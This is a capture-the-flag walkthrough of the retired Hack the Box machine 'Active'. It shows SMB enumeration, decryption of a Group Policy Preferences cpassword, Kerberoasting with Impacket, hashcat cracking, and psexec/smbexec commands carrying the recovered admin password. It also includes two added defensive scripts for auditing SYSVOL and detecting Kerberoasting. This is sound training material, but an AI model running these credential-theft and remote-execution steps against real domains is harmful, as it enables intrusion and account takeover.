This walkthrough is for the retired Hack the Box machine named Active and guess what? I won’t be using Metasploit!
Want to learn advanced pen testing techniques? Start with the Bypassing Application Whitelisting with MsBuild post!
Hack the Box is great for practicing ethical hacking and developing advanced hacking skills that are needed to pass the OSCP exam and others like it.
Here’s What You Need
- Active VIP Hack the Box Subscription
- Kali Linux Virtual Machine ( VirtualBox )
- Impacket ( https://github.com/SecureAuthCorp/impacket )
- gpprefdecrypt.py ( https://github.com/reider-roque/pentest-tools/tree/master/password-cracking/gpprefdecrypt.py )
HTB Active Walkthrough – Enumeration
Every time I add a new tool I like to be able to call it from any directory, so I add its path to my bash profile by editing /root/.bashrc.
nano ~/.bashrc
export PATH=$PATH:/usr/bin/AutoRecon
I start by running AutoRecon against the target to get a thorough service scan of the machine.
Check the results of the scan; for me they are in /root/results/10.10.10.100/report/notes.txt.
[*] domain found on tcp/53.
[*] kerberos-sec found on tcp/88.
[*] msrpc found on tcp/135.
[*] netbios-ssn found on tcp/139.
[*] ldap found on tcp/389.
[*] microsoft-ds found on tcp/445.
[*] kpasswd5 found on tcp/464.
[*] ncacn_http found on tcp/593.
[*] tcpwrapped found on tcp/636.
[*] ldap found on tcp/3268.
[*] tcpwrapped found on tcp/3269.
[*] msrpc found on tcp/49152.
[*] msrpc found on tcp/49153.
[*] msrpc found on tcp/4915
[*] msrpc found on tcp/49155.
[*] ncacn_http found on tcp/49157.
[*] msrpc found on tcp/49158.
[*] domain found on udp/53.
[*] ntp found on udp/123.
[*] domain found on udp/49152.
[*] msrpc found on tcp/5722.
[*] mc-nmf found on tcp/9389.
[*] http found on tcp/47001.
[*] msrpc found on tcp/49169.
[*] msrpc found on tcp/49172.
[*] msrpc found on tcp/49182.
These results make it look like the box is a Windows machine, what with all the Kerberos and LDAP services running.
Running an Nmap scan confirms the results are accurate.
SMB Enumeration
I start the enumeration of shares with smbmap, using the -H flag (short for “host”) to see what kind of access anonymous users have. We are anonymous users at this point.
smbclient -L 10.10.10.100 confirms the share permissions.
To connect to the Replication share I use smbclient, the SMB client already included in Kali Linux. You can also try rpcclient.
The top level of the share contains a directory named “active.htb”. That looks an awful lot like a domain name, which will be useful later.
The way things are going, this machine looks like a lesson in exploiting Group Policy Preferences, which were used here to add local accounts.
What I am looking for is a Groups.xml file that contains an encrypted password for a domain account.
Examining Groups.xml reveals account details: a username, SVC_TGS, and a cpassword.
Here’s the great part about Group Policy Preferences: Microsoft published the key used to encrypt cpassword, so it can be decrypted.
root@kali:~# gpprefdecrypt.py
Usage: python /usr/bin/gpprefdecrypt.py CPASSWORD
root@kali:~# gpprefdecrypt.py edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
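The defensive counterpart of the step above is auditing SYSVOL for leftover cpassword values before an attacker finds them. The following is an added example (not from the original post): it walks a SYSVOL tree, parses every GPP preference file that can carry a cpassword, and reports the file and account. The sample tree, GUIDs and cpassword blob are constructed placeholders, not values from the box.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# GPP preference files whose <Properties> element may carry a cpassword attribute
GPP_FILES = ("Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml")
# Attribute naming the account differs by preference type
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

def find_cpasswords(sysvol_root):
    """Walk a SYSVOL tree (or an offline copy) and list every stored cpassword."""
    root = Path(sysvol_root)
    findings = []
    for name in GPP_FILES:
        for path in sorted(root.rglob(name)):
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # malformed file; a real audit would log it
            for elem in tree.iter():
                props = elem.find("Properties")
                if props is None or not props.get("cpassword"):
                    continue
                account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "?")
                findings.append({"file": path.relative_to(root).as_posix(),
                                 "account": account, "changed": elem.get("changed", "?")})
    return findings

# Constructed sample: one Groups.xml carrying a (placeholder) cpassword and one
# without, laid out like SYSVOL\<domain>\Policies\<GUID>\MACHINE\Preferences\Groups
WITH_CPASSWORD = """<?xml version="1.0" encoding="utf-8"?>
<Groups><User name="active.htb\\SVC_TGS" changed="2018-01-01 00:00:00">
 <Properties action="U" cpassword="CONSTRUCTED_PLACEHOLDER_BLOB"
             userName="active.htb\\SVC_TGS"/></User></Groups>"""
CLEAN = """<?xml version="1.0" encoding="utf-8"?>
<Groups><User name="localadmin" changed="2019-01-01 00:00:00">
 <Properties action="U" userName="localadmin"/></User></Groups>"""

def build_sample_sysvol():
    """Create a throwaway SYSVOL-like tree (constructed data) and return its path."""
    base = Path(tempfile.mkdtemp())
    for guid, xml in (("{00000000-0000-0000-0000-000000000001}", WITH_CPASSWORD),
                      ("{00000000-0000-0000-0000-000000000002}", CLEAN)):
        d = base / "active.htb" / "Policies" / guid / "MACHINE" / "Preferences" / "Groups"
        d.mkdir(parents=True)
        (d / "Groups.xml").write_text(xml, encoding="utf-8")
    return base
```

Pointed at a real SYSVOL share (or a copy of it), any finding means the preference must be removed and the affected account’s password rotated, since the cpassword is recoverable by anyone who can read the share.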
My current user is SVC_TGS, so I change directories to that one. Changing there shows the first flag, user.txt, so we grab that one for now.
HTB Active Walkthrough – Kerberoasting
Any authenticated domain user ( e.g. domain.com\bob ) can request a Kerberos service ticket for any service. Once we hold a ticket-granting ticket ( TGT ) we can request a ticket-granting service ticket ( TGS ) for the associated service account from a domain controller. This is why dc-ip is an argument for the Kerberoasting attack scripts.
So we have credentials for a domain user; now we can carry out the attack by calling the GetUserSPNs.py script from Impacket. This finds the Service Principal Names associated with normal domain user accounts, queried with the account we now have. Windows relies on these SPNs to support Kerberos authentication. Once we get the hash of the ticket, which is encrypted with the credentials of the user account the service runs under, we can crack it.
This module will try to find Service Principal Names that are associated with normal user accounts.
https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py
# Since normal accounts’ passwords tend to be shorter than machine accounts’, and knowing that a TGS request will encrypt the ticket with the account the SPN is running under, this could be used for an offline bruteforcing attack of the SPN account’s NTLM hash if we can gather valid TGS for those SPNs.
The TGS ticket is encrypted using the service account’s NTLM hash. Now we have a TGS hash for the Administrator account. Let’s crack it.
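From the defender’s side, a Kerberoast run like the one above leaves a distinctive trail in Security event 4769 on the domain controller: successful TGS requests with RC4 ( etype 0x17 ) for SPNs owned by user accounts rather than machine accounts, and GetUserSPNs.py asks for one ticket per SPN it finds. The following is an added detection example (not from the original post) over a constructed, flattened 4769 sample; the pipe-delimited format and the host names and IPs are assumptions for the demo.

```python
from collections import defaultdict

# Constructed sample of Security event 4769 fields (real events are EVTX/XML; this
# flat form keeps the example self-contained). Field order:
# time|TargetUserName|ServiceName|TicketEncryptionType|Status|IpAddress
SAMPLE_4769 = """\
12:00:01|SVC_TGS@ACTIVE.HTB|DC$|0x12|0x0|10.10.14.5
12:00:02|SVC_TGS@ACTIVE.HTB|krbtgt|0x17|0x0|10.10.14.5
12:00:03|SVC_TGS@ACTIVE.HTB|Administrator|0x17|0x0|10.10.14.5
12:00:03|SVC_TGS@ACTIVE.HTB|svc_sql|0x17|0x0|10.10.14.5
12:05:00|bob@ACTIVE.HTB|svc_sql|0x12|0x0|10.10.10.50
"""

RC4_HMAC = "0x17"  # etype 23: the ticket type GetUserSPNs.py asks for and hashcat 13100 cracks

def parse_4769(text):
    """Turn the flat sample into a list of event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        t, user, svc, etype, status, ip = line.split("|")
        events.append({"time": t, "user": user, "service": svc,
                       "etype": etype, "status": status, "ip": ip})
    return events

def is_roastable_request(ev):
    """Successful TGS request for a user-account SPN (not a machine account, not
    krbtgt) issued with RC4: the shape a Kerberoast request leaves behind."""
    svc = ev["service"]
    return (ev["etype"].lower() == RC4_HMAC and ev["status"] == "0x0"
            and not svc.endswith("$") and svc.lower() != "krbtgt")

def kerberoast_alerts(events, threshold=2):
    """Group roastable requests by (account, source IP). GetUserSPNs.py requests a
    ticket for every SPN it finds, so one requester hitting several user SPNs
    stands out (a production rule would also bound the time window)."""
    per_requester = defaultdict(set)
    for ev in events:
        if is_roastable_request(ev):
            per_requester[(ev["user"], ev["ip"])].add(ev["service"])
    return {k: sorted(v) for k, v in per_requester.items() if len(v) >= threshold}
```

Legitimate RC4 service tickets still occur in domains with old services, so baseline them before alerting; the stronger fix is the one this box illustrates by contrast, a long random password (or a group managed service account) for any user account that holds an SPN.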
HTB Active Walkthrough – Crack with Hashcat
To crack on my MacBook I use brew to install hashcat.
brew install hashcat
I need to find the right mode by looking at the hashcat site; it looks like we have a match with 13100, “13100 Kerberos 5 TGS-REP etype 23 $krb5tgs”. I also use -a 0 for a straight dictionary attack mode. This makes sense, as the wordlist I am using, rockyou, is a dictionary of leaked passwords found in Kali.
hashcat -m 13100 kbhash.txt -a 0 rockyou.txt
The results of hashcat tell me that the password for the Administrator user account is “Ticketmaster1968”, a clever play on Kerberos authentication.
HTB Active Walkthrough – Privilege Escalation
So I have a username and a password for an administrator-level account; what to do? There are many options, but in this case I will use Impacket’s psexec.py. I have also included smbexec.py as another useful option.
python psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100 cmd
python smbexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100
In Conclusion
With a new terminal session open with administrator-level privileges, the end goal is complete. The next step is to grab the root.txt flag and submit it to Hack the Box to claim victory. That’s it for the HTB Active Walkthrough.